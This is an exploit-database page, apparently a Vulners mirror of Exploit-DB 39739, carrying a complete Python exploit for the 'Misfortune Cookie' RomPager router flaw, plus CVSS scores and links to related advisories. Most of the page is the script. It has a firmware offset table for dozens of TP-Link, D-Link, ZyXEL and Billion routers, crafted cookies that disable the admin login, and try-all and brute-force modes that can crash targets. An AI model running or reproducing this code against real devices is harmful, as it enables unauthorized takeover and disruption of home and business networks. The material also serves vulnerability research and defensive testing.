Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMilad DoorbashEDB-ID:39739
HistoryApr 27, 2016 - 12:00 a.m.

RomPager 4.34 (Multiple Router Vendors) - 'Misfortune Cookie' Authentication Bypass

2016-04-2700:00:00
Milad Doorbash
www.exploit-db.com
59

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.5 High

AI Score

Confidence

High

0.97 High

EPSS

Percentile

99.8%

JSON
# Title: Misfortune Cookie Exploit (RomPager <= 4.34) router authentication remover
# Date: 17/4/2016
# CVE: CVE-2015-9222 (http://mis.fortunecook.ie)
# Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,...
# Vulnerable models: http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf 
# Versions affected: RomPager <= 4.34 (specifically 4.07)
# Tested on : firmwares which are set as tested in the targets list
# Category: Remote Exploit
# Usage: ./exploit.py url
#	Example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040

# Author: Milad Doorbash
# Email: [email protected]
# Social: @doorbash
# Blog: http://doorbash.ir

# Many Thanks to : 
# 	Cawan Chui (http://embedsec.systems/embedded-device-security/2015/02/16/Misfortune-Cookie-CVE-2014-9222-Demystified.html)
#	Piotr Bania (http://piotrbania.com/all/articles/tplink_patch)
#	Grant Willcox (https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/10/porting-the-misfortune-cookie-exploit-whitepaperpdf)
# 	Chan (http://scz.617.cn/misc/201504141114.txt -- http://www.nsfocus.com.cn/upload/contents/2015/09/2015_09181715274142.pdf)

# Disclaimer :
#	This exploit is for testing and educational purposes only.Any other usage for this code is not allowed.
#	Author takes no responsibility for any actions with provided informations or codes.

# Description :
# 	Misfortune Cookie is a critical vulnerability that allows an intruder to remotely
# 	take over an Internet router and use it to attack home and business networks.With a few magic
#	cookies added to your request you bypass any authentication and browse the configuration
#	interface as admin, from any open port.

import requests
import sys
import time

MODE_TEST = 100000
MODE_BRUTE_FORCE = 100001

if len(sys.argv) == 1:
	print "usage: python " + sys.argv[0] + " url [enable]"
	print "example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040"
	exit()

url = str(sys.argv[1])
auth_byte = '\x00'
s = requests.Session()

if len(sys.argv) == 3:
	if str(sys.argv[2]) == 'enable':
		auth_byte = '\x01' # enable authenticaion again
	else:
		print "usage: python " + sys.argv[0] + " url [enable]" 
		exit()

targets = [

	["Azmoon	AZ-D140W		2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1",107367693,13], # 0x803D5A79		# tested
	["Billion	BiPAC 5102S		Av2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d						# ----------
	["Billion	BiPAC 5102S		Bv2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d						# ----------
	["Billion	BiPAC 5200		2.11.84.0(UE2.C2)3.11.11.6",107369545,9], # 0x803ec2ad					# ----------
	["Billion	BiPAC 5200		2_11_62_2_ UE0.C2D_3_10_16_0",107371218,21], # 0x803c53e5				# ----------
	["Billion	BiPAC 5200A		2_10_5 _0(RE0.C2)3_6_0_0",107366366,25], # 0x8038a6e1					# ----------
	["Billion	BiPAC 5200A		2_11_38_0 (RE0.C29)3_10_5_0",107371453,9], # 0x803b3a51					# ----------
	["Billion	BiPAC 5200GR4		2.11.91.0(RE2.C29)3.11.11.52",107367690,21], # 0x803D8A51			# tested
	["Billion	BiPAC 5200S		2.10.5.0 (UE0.C2C) 3.6.0.0",107368270,1], # 0x8034b109					# ----------
	["Billion	BiPAC 5200SRD		2.12.17.0_UE2.C3_3.12.17.0",107371378,37], # 0x8040587d				# ----------
	["Billion	BiPAC 5200SRD		2_11_62_2(UE0.C3D)3_11_11_22",107371218,13], # 0x803c49d5			# ----------
	["D-Link	DSL-2520U	Z1	1.08 DSL-2520U_RT63261_Middle_East_ADSL",107368902,25], # 0x803fea01	# tested
	["D-Link	DSL-2600U	Z1	DSL-2600U HWZ1",107366496,13], # 0x8040637d								# ----------
	["D-Link	DSL-2600U	Z2	V1.08_ras",107360133,20], # 0x803389B0									# ----------
	["TP-Link	TD-8616		V2	TD-8616_v2_080513",107371483,21], # 0x80397055							# ----------
	["TP-Link	TD-8816		V4	TD-8816_100528_Russia",107369790,17], # 0x803ae0b1						# ----------
	["TP-Link	TD-8816		V4	TD-8816_V4_100524",107369790,17], # 0x803ae0b1							# ----------
	["TP-Link	TD-8816		V5	TD-8816_100528_Russia",107369790,17], # 0x803ae0b1						# ----------
	["TP-Link	TD-8816		V5	TD-8816_V5_100524",107369790,17], # 0x803ae0b1							# tested
	["TP-Link	TD-8816		V5	TD-8816_V5_100903",107369790,17], # 0x803ae0b1							# ----------
	["TP-Link	TD-8816		V6	TD-8816_V6_100907",107371426,17], # 0x803c6e09							# ----------
	["TP-Link	TD-8816		V7	TD-8816_V7_111103",107371161,1], # 0x803e1bd5							# ----------
	["TP-Link	TD-8816		V7	TD-8816_V7_130204",107370211,5], # 0x80400c85							# ----------
	["TP-Link	TD-8817		V5	TD-8817_V5_100524",107369790,17], # 0x803ae0b1							# ----------
	["TP-Link	TD-8817		V5	TD-8817_V5_100702_TR",107369790,17], # 0x803ae0b1						# ----------
	["TP-Link	TD-8817		V5	TD-8817_V5_100903",107369790,17], # 0x803ae0b1							# ----------
	["TP-Link	TD-8817		V6	TD-8817_V6_100907",107369788,1], # 0x803b6e09							# ----------
	["TP-Link	TD-8817		V6	TD-8817_V6_101221",107369788,1], # 0x803b6e09							# ----------
	["TP-Link	TD-8817		V7	TD-8817_V7_110826",107369522,25], # 0x803d1bd5							# ----------
	["TP-Link	TD-8817		V7	TD-8817_V7_130217",107369316,21], # 0x80407625							# ----------
	["TP-Link	TD-8817		V7	TD-8817_v7_120509",107369321,9], # 0x803fbcc5							# tested
	["TP-Link	TD-8817		V8	TD-8817_V8_140311",107351277,20], # 0x8024E148							# Grant	Willcox	
	["TP-Link	TD-8820		V3	TD-8820_V3_091223",107369768,17], # 0x80397E69							# Chan
	["TP-Link	TD-8840T 	V1	TD-8840T_080520",107369845,5], # 0x80387055								# ----------
	["TP-Link	TD-8840T 	V2	TD-8840T_V2_100525",107369790,17], # 0x803ae0b1							# tested
	["TP-Link	TD-8840T 	V2	TD-8840T_V2_100702_TR",107369790,17], # 0x803ae0b1						# ----------
	["TP-Link	TD-8840T 	V2	TD-8840T_v2_090609",107369570,1], # 0x803c65d5							# ----------
	["TP-Link	TD-8840T 	V3	TD-8840T_V3_101208",107369766,17], #0x803c3e89							# tested	
	["TP-Link	TD-8840T 	V3	TD-8840T_V3_110221",107369764,5], # 0x803d1a09							# ----------
	["TP-Link	TD-8840T 	V3	TD-8840T_V3_120531",107369688,17], # 0x803fed35							# ----------
	["TP-Link	TD-W8101G 	V1	TD-W8101G_090107",107367772,37], # 0x803bf701							# ----------
	["TP-Link	TD-W8101G 	V1	TD-W8101G_090107",107367808,21], # 0x803e5b6d							# ----------
	["TP-Link	TD-W8101G 	V2	TD-W8101G_V2_100819",107367751,21], # 0x803dc701						# ----------
	["TP-Link	TD-W8101G 	V2	TD-W8101G_V2_101015_TR",107367749,13], # 0x803e1829						# ----------
	["TP-Link	TD-W8101G 	V2	TD-W8101G_V2_101101",107367749,13], # 0x803e1829						# ----------
	["TP-Link	TD-W8101G 	V3	TD-W8101G_V3_110119",107367765,25], # 0x804bb941						# ----------
	["TP-Link	TD-W8101G 	V3	TD-W8101G_V3_120213",107367052,25], # 0x804e1ff9						# ----------
	["TP-Link	TD-W8101G 	V3	TD-W8101G_V3_120604",107365835,1], # 0x804f16a9							# ----------
	["TP-Link	TD-W8151N	V3	TD-W8151N_V3_120530",107353867,24], # 0x8034F3A4						# tested
	["TP-Link	TD-W8901G	V1	TD-W8901G_080522",107367787,21], # 0x803AB30D							# Piotr Bania
	["TP-Link	TD-W8901G	V1,2	TD-W8901G_080522",107368013,5], # 0x803AB30D						# ----------
	["TP-Link	TD-W8901G	V2	TD-W8901G_090113_Turkish",107368013,5], # 0x803AB30D					# ----------
	["TP-Link	TD-W8901G	V3	TD-W8901G(UK)_V3_140512",107367854,9], # 0x803cf335						# tested
	["TP-Link	TD-W8901G	V3	TD-W8901G_V3_100603",107367751,21], # 0x803DC701						# chan
	["TP-Link	TD-W8901G	V3	TD-W8901G_V3_100702_TR",107367751,21], # 0x803DC701						# tested
	["TP-Link	TD-W8901G	V3	TD-W8901G_V3_100901",107367749,13], # 0x803E1829						# tested
	["TP-Link	TD-W8901G	V6	TD-W8901G_V6_110119",107367765,25], # 0x804BB941						# Chan
	["TP-Link	TD-W8901G	V6	TD-W8901G_V6_110915",107367682,21], # 0x804D7CB9						# Chan
	["TP-Link	TD-W8901G 	V6	TD-W8901G_V6_120418",107365835,1], # 0x804F16A9							# ----------
	["TP-Link	TD-W8901G 	V6 	TD-W8901G_V6_120213",107367052,25], # 0x804E1FF9						# ----------
	["TP-Link	TD-W8901GB	V3	TD-W8901GB_V3_100727",107367756,13], # 0x803dfbe9						# ----------
	["TP-Link	TD-W8901GB	V3	TD-W8901GB_V3_100820",107369393,21], # 0x803f1719						# ----------
	["TP-Link	TD-W8901N	V1	TD-W8901N v1_111211",107353880,0],  # 0x8034FF94						# cawan	Chui
	["TP-Link	TD-W8951ND	V1	TD-TD-W8951ND_V1_101124,100723,100728",107369839,25], # 0x803d2d61		# tested
	["TP-Link	TD-W8951ND	V1	TD-TD-W8951ND_V1_110907",107369876,13], # 0x803d6ef9 					# ----------
	["TP-Link	TD-W8951ND	V1	TD-W8951ND_V1_111125",107369876,13], # 0x803d6ef9						# ----------
	["TP-Link	TD-W8951ND	V3	TD-W8951ND_V3.0_110729_FI",107366743,21], # 0x804ef189					# ----------
	["TP-Link	TD-W8951ND	V3	TD-W8951ND_V3_110721",107366743,21], # 0x804ee049						# ----------
	["TP-Link	TD-W8951ND	V3	TD-W8951ND_V3_20110729_FI",107366743,21], # 0x804ef189					# ----------
	["TP-Link	TD-W8951ND	V4	TD-W8951ND_V4_120511",107364759,25],  # 0x80523979						# tested
	["TP-Link	TD-W8951ND	V4	TD-W8951ND_V4_120607",107364759,13], # 0x80524A91						# tested
	["TP-Link	TD-W8951ND	V4	TD-W8951ND_v4_120912_FL",107364760,21], # 0x80523859					# tested
	["TP-Link	TD-W8961NB	V1	TD-W8961NB_V1_110107",107369844,17], # 0x803de3f1						# tested
	["TP-Link	TD-W8961NB	V1	TD-W8961NB_V1_110519",107369844,17], # 0x803de3f1						# ----------
	["TP-Link	TD-W8961NB	V2	TD-W8961NB_V2_120319",107367629,21], # 0x80531859						# ----------
	["TP-Link	TD-W8961NB	V2	TD-W8961NB_V2_120823",107366421,13], # 0x80542e59						# ----------
	["TP-Link	TD-W8961ND	V1	TD-W8961ND_V1_100722,101122",107369839,25], # 0x803D2D61				# tested
	["TP-Link	TD-W8961ND	V1	TD-W8961ND_V1_101022_TR",107369839,25], # 0x803D2D61					# ----------
	["TP-Link	TD-W8961ND	V1	TD-W8961ND_V1_111125",107369876,13], # 0x803D6EF9						# ----------
	["TP-Link	TD-W8961ND	V2	TD-W8961ND_V2_120427",107364732,25], # 0x8052e0e9						# ----------
	["TP-Link	TD-W8961ND	V2	TD-W8961ND_V2_120710_UK",107364771,37], # 0x80523AA9					# ----------
	["TP-Link	TD-W8961ND	V2	TD-W8961ND_V2_120723_FI",107364762,29], # 0x8052B6B1					# ----------
	["TP-Link	TD-W8961ND	V3	TD-W8961ND_V3_120524,120808",107353880,0], # 0x803605B4					# ----------
	["TP-Link	TD-W8961ND	V3	TD-W8961ND_V3_120830",107353414,36], # 0x803605B4						# ----------
	["ZyXEL	P-660R-T3	V3	3.40(BOQ.0)C0",107369567,21], # 0x803db071									# tested
	["ZyXEL	P-660RU-T3	V3	3.40(BJR.0)C0",107369567,21], # 0x803db071									# ----------
	

# *---------- means data for this firmware is obtained from other tested firmwares.
# if you tested on your devices report to me so i can change them to tested state.
# don't forget to mention your device model and full firmware version in your reports.
# I could not gather information for every vulnerable firmwares since some vendors has removed
# vulnerable/old ones from their websites or add some unknown-yet security mechanisms to the them.
# if you want to add missing firmwares data to list you can do it by reading blog posts
# mentioned in "Many thanks to" part at the beginning.Btw please don't hesitate to contact me
# for any question or further information.

]

def request(num,n,data):
	try:
		print "\nConnecting to: " + url + "\n"
		s.headers.update({"Cookie":"C" + str(num) + "=" + "B"* n + data + ";"})
		r = s.get(url)
		print str(r.status_code) + "\n"
		for i in r.headers:
			print i + ": " + r.headers[i]
		return [r.status_code,r.text]
	except Exception, e:
		return 1000


def printMenu():
	print """
         __  __ _      __            _                    
        |  \/  (_)___ / _| ___  _ __| |_ _   _ _ __   ___ 
        | |\/| | / __| |_ / _ \| '__| __| | | | '_ \ / _ \			
        | |  | | \__ \  _| (_) | |  | |_| |_| | | | |  __/				
        |_|  |_|_|___/_|  \___/|_|   \__|\__,_|_| |_|\___|			
                                                          
   ____            _    _        _____            _       _ _   
  / ___|___   ___ | | _(_) ___  | ____|_  ___ __ | | ___ (_) |_ 
 | |   / _ \ / _ \| |/ / |/ _ \ |  _| \ \/ / '_ \| |/ _ \| | __|
 | |__| (_) | (_) |   <| |  __/ | |___ >  <| |_) | | (_) | | |_ 
  \____\___/ \___/|_|\_\_|\___| |_____/_/\_\ .__/|_|\___/|_|\__|
                                           |_|                 

----------------------------------------------------------------------------
"""
	for k,i in enumerate(targets):
		print str(k+1) + "- " + i[0]

	print """
0- Not sure just try them all! (may cause reboot)
T- Test misfortune cookie vulnerablity against target
B- BruteForce to find auth-remover cookie (may cause reboot)
"""
	c = 0
	while True:
		selection = raw_input("select a target: ")
		if selection == "T":
			return MODE_TEST
		elif selection == "B":
			return MODE_BRUTE_FORCE
		c = int(selection)
		if c <= len(targets):
			break
		else:
			print "bad input try again"
	return c - 1

def bruteforce():
	for i in range(107364000,107380000):
		for j in range(0,40):
			print "testing " + str(i) + " , " + str(j)
			result = request(i,j,"\x00")[0]
			if result <= 302:
				print "YEAHHH!!!!"
				print str(i) + " , " + str(j) + " is the answer!"
				return
			elif result == 1000:
				time.sleep(60)

def exploit():
	c = printMenu()
	if c < 0:
		for k,i in enumerate(targets):
			print "testing #" + str(k+1) + " ..."
			result = request(i[1],i[2],auth_byte)[0]
			if result == 1000:
				print "\n[!] Error. maybe router crashed by sending wrong cookie or it's your connection problem.waiting 60 seconds for router to reboot"
				time.sleep(60)
			elif result <= 302:
				print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."
				break # some routers always return 200 (for custom login page). so maybe we should comment this line
			else:
				print "\n[!] Failed."
	else:
		if c == MODE_TEST:
			if "HelloWorld" in request(107373883,0,"/HelloWorld")[1]:
				print "\n[!] Target is vulnerable"
			else:
				print "\n[!] Target is not vulnerable"
		elif c == MODE_BRUTE_FORCE:
			bruteforce()
		elif request(targets[c][1],targets[c][2],auth_byte)[0] > 302:
			print "\n[!] Failed."
		else:
			print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."

exploit()

Related

packetstorm 1
exploitpack 1
kitploit 1
openvas 1
threatpost 2
cve 2
checkpoint_advisories 1
seebug 2
nvd 2
prion 2
zdt 1
ics 1
canvas 1
metasploit 2
thn 1
cvelist 2
nessus 3
cert 1
huawei 1
nmap 1
packetstorm
packetstorm
RomPager 4.34 Authentication Bypass
2016-04-27 00:00:00
exploitpack
exploitpack
RomPager 4.34 (Multiple Router Vendors) - Misfortune Cookie Authentication Bypass
2016-04-27 00:00:00
kitploit
kitploit
hacklib - Pentesting, Port Scanning, and Logging in anywhere with Python
2016-10-05 14:30:00
openvas
openvas
Allegro RomPager `Misfortune Cookie` Vulnerability
2014-12-23 00:00:00
threatpost
threatpost
Critical Flaws in Syringe Pump, Device Gateways Threaten Patient Safety
2018-08-30 13:34:37
New Mirai Variant Roars into Action With 54 Hour DDoS Attacks
2017-03-30 14:50:51
cve
cve
CVE-2015-9222
2018-04-18 14:29:09
CVE-2014-9222
2014-12-24 18:59:06
checkpoint_advisories
checkpoint_advisories
RomPager Authentication Security Bypass - Misfortune Cookie (CVE-2014-9222)
2014-12-03 00:00:00
seebug
seebug
Allegro v4.34 权限提升漏洞
2015-05-07 00:00:00
Eir’s D1000 Modem Is Wide Open To Being Hacked.
2017-12-28 00:00:00
nvd
nvd
CVE-2014-9222
2014-12-24 18:59:06
CVE-2015-9222
2018-04-18 14:29:09
prion
prion
Memory corruption
2014-12-24 18:59:00
Code injection
2018-04-18 14:29:00
zdt
zdt
RomPager 4.34 - Misfortune Cookie Router Authentication Bypass
2016-04-27 00:00:00
ics
ics
Qualcomm Life Capsule
2018-08-28 12:00:00
canvas
canvas
Immunity Canvas: CVE_2014_9222
2014-12-24 18:59:00
metasploit
metasploit
Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass
2016-11-13 09:39:26
Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Scanner
2014-12-19 01:21:26
thn
thn
Router Vulnerability Puts 12 Million Home and Business Routers at Risk
2014-12-19 02:18:00
cvelist
cvelist
CVE-2014-9222
2014-12-24 18:00:00
CVE-2015-9222
2018-04-02 00:00:00
nessus
nessus
Allegro RomPager 4.07 < 4.34 Multiple Vulnerabilities (Misfortune Cookie)
2015-02-20 00:00:00
Allegro RomPager HTTP Cookie Management Remote Code Execution Vulnerability (Misfortune Cookie)
2014-12-30 00:00:00
Allegro RomPager HTTP Cookie Management Remote Code Execution Vulnerability (Misfortune Cookie)
2014-12-24 00:00:00
cert
cert
Multiple broadband routers use vulnerable versions of Allegro RomPager
2014-12-19 00:00:00
huawei
huawei
Security Advisory-Multiple Vulnerabilities in the RomPager Component of Home Gateway
2014-12-19 00:00:00
nmap
nmap
http-vuln-misfortune-cookie NSE Script
2015-05-31 18:34:22

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.5 High

AI Score

Confidence

High

0.97 High

EPSS

Percentile

99.8%

JSON
Related for EDB-ID:39739
packetstorm1exploitpack1kitploit1openvas1threatpost2cve2checkpoint_advisories1seebug2nvd2prion2zdt1ics1canvas1metasploit2thn1cvelist2nessus3cert1huawei1nmap1